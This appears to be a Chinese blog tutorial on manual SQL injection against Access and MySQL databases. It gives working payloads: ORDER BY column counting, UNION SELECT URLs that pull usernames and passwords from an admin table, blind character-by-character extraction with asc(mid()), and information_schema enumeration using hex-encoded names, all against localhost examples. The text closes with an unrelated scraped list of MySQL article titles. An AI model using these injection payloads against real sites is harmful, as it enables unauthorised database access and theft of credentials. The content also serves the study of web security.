mysql 解表_Access MySql之常规手工注入
(一)1.access注入之联合查询法:
单引号判断 错误页面
And 1=1 正确页面
And 1=2 错误页面
Order by xx 查询字段数目
Order by 22 正确 order by 23 错误 22个字段数目
猜解表名:
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1511 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin?
查询access数据库中有没有admin表。
猜解列名:
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1511 UNION SELECT
1,2,username,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
查询access数据库中admin表下面有没有username,password列名。
猜解数据:
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1511%20UNION%20SELECT%201,2,username,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22%20from%20admin
2. access注入之逐字猜解法:
查表:and exists (select * from admin)
查列:and exists (select xxuser_name from admin)
查数据:
and (select top 1 len(username) from admin)=5
and (select top 1 asc(mid(username,1,1)) from admin)=97 判断第一位
and (select top 1 asc(mid(username,2,1)) from admin)=97 判断第二位
最终得到账户密码:admin? admin888? 。
(二) MySQL常规手工注入:
判断注入:
Order by xx 猜字段数目
Union select 1,2,3,4,5,…..
查询函数:
Database() :数据库名 fanke
Version() :数据库版本 5.5.40
User() : 数据库用户 root@localhost
@@version_compile_os :操作系统 win32
Mysql5.0以上版本手工注入:
Information_schema:存储mysql数据库下所有数据库的表名和列名信息的自带数据库
table_name:表名
table_schema:数据库名
column_name:列名
information_schema.tables:存储mysql数据库下所有数据库的表名信息的表
information_schema.columns:存储mysql数据库下所有数据库的列名信息的表
查询数据库名为fanke(0x66616E6B65)下面的表名信息:
http://127.0.0.1/php.php?x=4%20union select table_name
,2,3,4,5 from information_schema.tables where table_schema=0x66616E6B65
?查询表名为user(0x75736572)下面的列名信息:
http://127.0.0.1/php.php?x=4%20union select column_name
,2,3,4,5 from information_schema.columns where table_name=0x75736572
?直接获取user表下面数据:
http://127.0.0.1/php.php?x=4%20union select username,password,3,4,5 from user
转载请注明来源 即刻安全!
mysql 解表_Access MySql之常规手工注入相关推荐
- mysql 列出表_[MySQL优化1]centos中MySQL列出所有表
步骤1 - 连接到MySQL数据库服务器: [root@host]# mysql -u root -p Enter password:****** 提示登陆成功 Welcome to the MySQ ...
- 并发产生mysql锁表_Yii+MYSQL锁表防止并发情况下重复数据的方法
本文实例讲述了Yii+MYSQL锁表防止并发情况下重复数据的方法.分享给大家供大家参考,具体如下: lock table 读锁定 如果一个线程获得在一个表上的read锁,那么该线程和所有其他线程只能从 ...
- MySQL删除表数据 MySQL清空表命令 3种方法
一.MySQL清空表数据命令:truncate SQL语法: truncate table 表名 注意: 不能与where一起使用. truncate删除数据后是不可以rollback的. trunc ...
- MySQL删除表数据 MySQL清空表数据命令 3种方法
一.MySQL清空表数据命令:truncate SQL语法: truncate table 表名; 注意: 不能与where一起使用. truncate删除数据后是不可以rollback的. trun ...
- mysql 创建表 1067,Mysql 错误 1067
Mysql 错误 1067 启动Mysql 错误 1067 进程意外终止的一种解决方法 mysqld-nt --defaults-file=my.ini --standalone --console ...
- mysql分析表锁,MySQL锁分析和监控
通常在MySQL的管理和监控中,Active Session(活动会话)是监控指标中的一个很重要的指标,通过活动会话监控,可以很清楚的了解到数据库当前是否有SQL堆积,是否处于非常繁忙的状态.那么除了 ...
- mysql 雇员表脚本,mysql压力测试脚本实例_MySQL
本文实例讲述了mysql压力测试的脚本,分享给大家供大家参考.具体如下: 创建表DEPT 代码如下: CREATE TABLE dept( /*部门表*/ deptno MEDIUMINT UNSIG ...
- mysql 修改表 引擎,mysql如何修改表类型(表引擎)
参考阅读:http://www.manongjc.com/article/1205.html 最近遇到一个修改 MySQL 表类型的问题,以前在 phpmyadmin 管理 mysql 数据库时,建立 ...
- mysql+分表+1168,MySQL使用MERGE進行分表實現
使用MERGE進行分表: 發現一個MERGE表一直出現Unable to open underlying table which is differently defined or of non-My ...
最新文章
- windows xcopy
- Java 接口(interface)的用途和好处
- 骆驼祥子大事件时间轴_骆驼中的事件处理
- linux查看命令类型,查看linux命令类型
- c语言不同类型变量用什么表示什么作用,C语言数据类型及变量整理
- 迭代终止准则的三种形式_一种经验模态分解筛选迭代过程终止准则的方法与流程...
- mysql foreign key_MYSQL外键(Foreign Key)的使用
- Xcode pch文件配置及object c 单例创建
- 区块链:核心技术概览
- 工作用哪个邮箱好用?好用的办公邮箱让你放假无烦恼
- Android源码修改 替换安装apk时,出现的android小机器人图标。
- Linux组RAID5、RAID6、RAID10
- LINUX下设置postgresql的登录密码
- 小提琴机器人拉法_好和弦 | [Ep.195]小提琴跟中提琴到底有多少种拉法?
- 大数据技术在电商的应用
- 新闻管理系统——新闻详情页面+评论模块
- Lecture 002-LP introduction
- [Tomcat] server.xml配置appBase与docBase的用法
- uni-app 简单引入iconfont示例(阿里妈妈)
- ETL学习之五:创建新的 Integration Services 项目